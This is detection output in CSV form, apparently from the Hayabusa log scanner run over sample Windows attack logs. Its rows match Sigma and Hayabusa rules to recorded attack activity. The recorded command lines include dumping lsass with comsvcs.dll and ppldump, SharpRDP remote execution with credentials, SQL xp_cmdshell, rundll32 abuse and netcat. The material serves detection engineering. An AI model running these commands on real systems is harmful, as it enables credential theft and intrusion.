""C:\Windows\system32\rundll32.exe"" zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,medium,Too Long PowerShell Commandlines,,rules/sigma/process_creation/sysmon_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,FromBase64String Command Line,,rules/sigma/process_creation/win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:17:14.893 +09:00,MSEDGEWIN10,1,high,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation/win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbas_rundll32_zipfldr_routethecall_shell.evtx -2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx -2019-08-14 21:48:15.921 +09:00,MSEDGEWIN10,4703,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/win10_4703_SeDebugPrivilege_enabled.evtx -2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:37.100 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-23 21:37:38.521 +09:00,MSEDGEWIN10,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Persistence_Winsock_Catalog Change EventId_1.evtx -2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cscript c:\ProgramData\memdump.vbs notepad.exe : Path: C:\Windows\System32\cscript.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\cmd.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:07.873 +09:00,MSEDGEWIN10,1,high,WScript or CScript Dropper,,rules/sigma/process_creation/win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.257 +09:00,MSEDGEWIN10,7,informational,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-08-30 21:54:08.354 +09:00,MSEDGEWIN10,1,medium,Process Dump via Comsvcs DLL,,rules/sigma/process_creation/win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_10_1_memdump_comsvcs_minidump.evtx -2019-09-01 20:54:22.450 +09:00,MSEDGEWIN10,5145,medium,DCERPC SMB Spoolss Named Pipe,,rules/sigma/builtin/security/win_dce_rpc_smb_spoolss_named_pipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/spoolsample_5145.evtx -2019-09-03 20:04:07.207 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx -2019-09-03 20:04:56.358 +09:00,MSEDGEWIN10,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/tunna_iis_rdp_smb_tunneling_sysmon_3.evtx -2019-09-09 04:17:44.249 +09:00,MSEDGEWIN10,13,low,Usage of Sysinternals Tools,,rules/sigma/registry_event/registry_event_sysinternals_eula_accepted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_valid_account_guest_rid_hijack.evtx -2019-09-22 20:22:05.201 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3461203602-4096304019-2269080069-501 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx -2019-09-22 20:23:19.251 +09:00,MSEDGEWIN10,4732,high,User added to local Administrators group,User: - : SID: S-1-5-20 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/Network_Service_Guest_added_to_admins_4732.evtx -2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c set > c:\users\\public\netstat.txt : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\sqlsvc : Parent Command: ""c:\Program Files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"" -sSQLEXPRESS",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx -2019-11-03 22:51:58.263 +09:00,MSEDGEWIN10,1,critical,Suspicious Shells Spawn by SQL Server,,rules/sigma/process_creation/win_susp_shell_spawn_from_mssql.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sysmon_1_exec_via_sql_xpcmdshell.evtx -2019-11-15 17:19:02.298 +09:00,alice.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx -2019-11-15 17:19:17.134 +09:00,alice.insecurebank.local,4634,informational,Logoff,User: ANONYMOUS LOGON : LogonID: 0x1d12916,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4624 LT3 AnonymousLogon Localhost - JuicyPotato.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,FileProtocolHandler ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:50.353 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:51.016 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,FileProtocolHandler ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:44:51.122 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 url.dll,OpenURL ms-browser:// : Path: C:\Windows\System32\rundll32.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.237 +09:00,MSEDGEWIN10,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.819 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: rundll32 url.dll,OpenURL ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:46:43.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd.exe /c start ms-browser:// : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.044 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.412 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""cmd.exe"" /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: cmd.exe /c start ms-browser://",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:17.447 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""cmd.exe"" /c notepad.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: explorer ms-browser:// : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.243 +09:00,MSEDGEWIN10,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-15 05:48:45.293 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: MSEDGEWIN10\IEUser : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmi_PoisonHandler_Mr-Un1k0d3r_sysmon_1_13.evtx -2020-01-24 04:09:34.052 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: SharpRDP.exe computername=192.168.56.1 command=""C:\Temp\file.exe"" username=domain\user password=password : Path: C:\ProgramData\USOShared\SharpRDP.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/sharprdp_sysmon_7_mstscax.dll.evtx -2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: Furutaka.exe dummy2.sys : Path: C:\Users\Public\BYOV\TDL\Furutaka.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx -2020-02-10 17:28:12.856 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DSE_bypass_BYOV_TDL_dummydriver_sysmon_6_7_13.evtx -2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: ppldump.exe -p lsass.exe -o a.png : Path: C:\Users\Public\BYOV\ZAM64\ppldump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-02-10 19:08:24.535 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-02-10 19:08:24.666 +09:00,MSEDGEWIN10,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_BYOV_Zam64_CA_Memdump_sysmon_7_10.evtx -2020-03-07 22:17:39.984 +09:00,MSEDGEWIN10,4699,medium,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_SeImpersonatePriv_enabled_back_for_upnp_localsvc_4698.evtx -2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,critical,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx -2020-03-09 07:11:34.340 +09:00,MSEDGEWIN10,4656,high,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_hashdump_4663_4656_lsass_access.evtx -2020-03-21 14:00:16.296 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: usoclient StartInteractiveScan : Path: C:\Windows\System32\UsoClient.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.980 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 